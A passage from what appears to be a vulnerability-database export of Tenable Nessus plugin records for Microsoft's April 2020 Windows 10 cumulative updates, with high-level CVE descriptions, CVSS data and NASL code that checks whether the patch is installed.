(CVE-2020-0942)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery Optimization service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Push Notification Service handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-0940,\n CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969)\");\n # https://support.microsoft.com/en-us/help/4550927/windows-10-update-kb4550927\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b2c839d4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4550927.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550927');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nmy_os_build = get_kb_item(\"SMB/WindowsVersionBuild\");\nproductname = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (my_os_build = \"16299\" && \"enterprise\" >!< tolower(productname) && \"education\" >!< tolower(productname) && \"server\" >!< tolower(productname))\n audit(AUDIT_OS_NOT, \"a supported version of Windows\");\n\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550927])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-06T14:17:31", "description": "The remote Windows host is missing security update 4550922.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0985, CVE-2020-0996)\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the Windows WpcDesktopMonSvc improperly manages memory.\n (CVE-2020-0934)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could overwrite files in arbitrary locations with elevated permissions. (CVE-2020-0942)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0937, CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0948, CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the Windows Delivery Optimization service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-0940, CVE-2020-1001, CVE-2020-1006, CVE-2020-1017)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0913, CVE-2020-1000, CVE-2020-1003)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0784, CVE-2020-0888)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows System Assessment Tool handles file operations. (CVE-2020-1011)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0969, CVE-2020-0970)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550922: Windows 10 Version 1803 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0699", "CVE-2020-0784", "CVE-2020-0794", "CVE-2020-0821", "CVE-2020-0888", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0913", "CVE-2020-0934", "CVE-2020-0936", "CVE-2020-0937", "CVE-2020-0938", "CVE-2020-0940", "CVE-2020-0942", "CVE-2020-0944", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0949", "CVE-2020-0950", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0969", "CVE-2020-0970", "CVE-2020-0982", "CVE-2020-0983", "CVE-2020-0985", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0996", "CVE-2020-0999", "CVE-2020-1000", "CVE-2020-1001", "CVE-2020-1003", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1006", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1011", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1017", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1029", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550922.NASL", "href": "https://www.tenable.com/plugins/nessus/135466", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135466);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0699\",\n \"CVE-2020-0784\",\n \"CVE-2020-0794\",\n \"CVE-2020-0821\",\n \"CVE-2020-0888\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0913\",\n \"CVE-2020-0934\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0940\",\n \"CVE-2020-0942\",\n \"CVE-2020-0944\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0970\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0996\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1001\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1006\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1017\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1029\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"MSKB\", value:\"4550922\");\n script_xref(name:\"MSFT\", value:\"MS20-4550922\");\n script_xref(name:\"IAVA\", value:\"2020-A-0156-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0157-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550922: Windows 10 Version 1803 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550922.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985, CVE-2020-0996)\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows WpcDesktopMonSvc improperly manages memory.\n (CVE-2020-0934)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0699, CVE-2020-0962)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could\n overwrite files in arbitrary locations with elevated\n permissions. (CVE-2020-0942)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0944, CVE-2020-1029)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-0794)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery Optimization service improperly handles\n objects in memory. An attacker who 